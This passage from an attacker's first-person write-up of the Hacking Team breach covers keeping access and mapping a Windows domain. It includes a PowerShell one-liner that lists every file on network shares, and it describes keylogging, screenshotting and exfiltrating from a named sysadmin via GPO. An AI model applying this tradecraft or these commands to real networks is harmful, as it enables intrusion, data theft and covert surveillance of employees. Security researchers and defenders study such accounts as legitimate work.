Once you have gained access, you want to maintain it. Persistence is really only a challenge for sons of bitches [hijos de puta] like the ones in Hacking Team, who want to hack activists or other individuals. When you're hacking businesses, you don't need persistence because the business never sleeps. The only 'persistence' I use is in duqu 2's sense, executing in the RAM of a couple of servers with high rates of uptime. In the hypothetical case that everything is reset at once, I have passwords and a golden ticket [1] set aside. You can read more information about persistence mechanisms for Windows here [2][3][4]. But for hacking businesses, you don't need it, and it raises the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/

[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/

[3] http://www.hexacorn.com/blog/category/autostart-persistence/

[4] https://blog.netspi.com/tag/persistence/

13.3 - Internal reconnaissance:

The best tool these days for understanding Windows networks is Powerview [1]. It's worth the trouble to read everything by the author [2], and above all [3], [4], [5], and [6]. Powershell is, again, very powerful [7]. But since there are still many 2003 and 2000 servers without powershell, you should also learn the old school way [8], with tools like netview.exe [9] or the Windows "net view" command. Other techniques that I like are:

- Download a list of file names: With the domain administrator account, you can download all the file names in the network with powerview:

      Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
        select-string '^(.*) \t-' |
        %{dir -recurse $_.Matches[0].Groups[1] | select fullname | out-file -append files.txt}

  You can then read it at your leisure later on, and choose the ones that you want to download.

- Read emails: As we have already seen, you can download emails with powershell, and obtain a lot of useful information.

- Read sharepoint: This is another place where many businesses have important information. You can download it with powershell [10].

- Active Directory [11]: It holds a lot of useful information about users and computers. Without being the domain admin, you can already find a great deal of information with powerview and other tools [12]. After becoming the domain admin, you should export all the information from AD using csvde or some other tools.

- Spy on the employees: One of my favourite pastimes is to hunt the sysadmins. By spying on Christian Pozzi (Hacking Team's sysadmin), I gained access to the Nagios server, which gave me access to the 'rete sviluppo' (the development network with the RCS source code). With a simple combination of PowerSploit's Get-Keystrokes and Get-TimedScreenshot [13], nishang's Do-Exfiltration, and GPO, I could spy on any employee I wanted, or even the entire domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

[2] http://www.harmj0y.net/blog/tag/powerview/

[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/

[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/

[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/

[6] http://www.slideshare.net/harmj0y/i-have-the-powerview

[7] https://adsecurity.org/?p=2535

[8]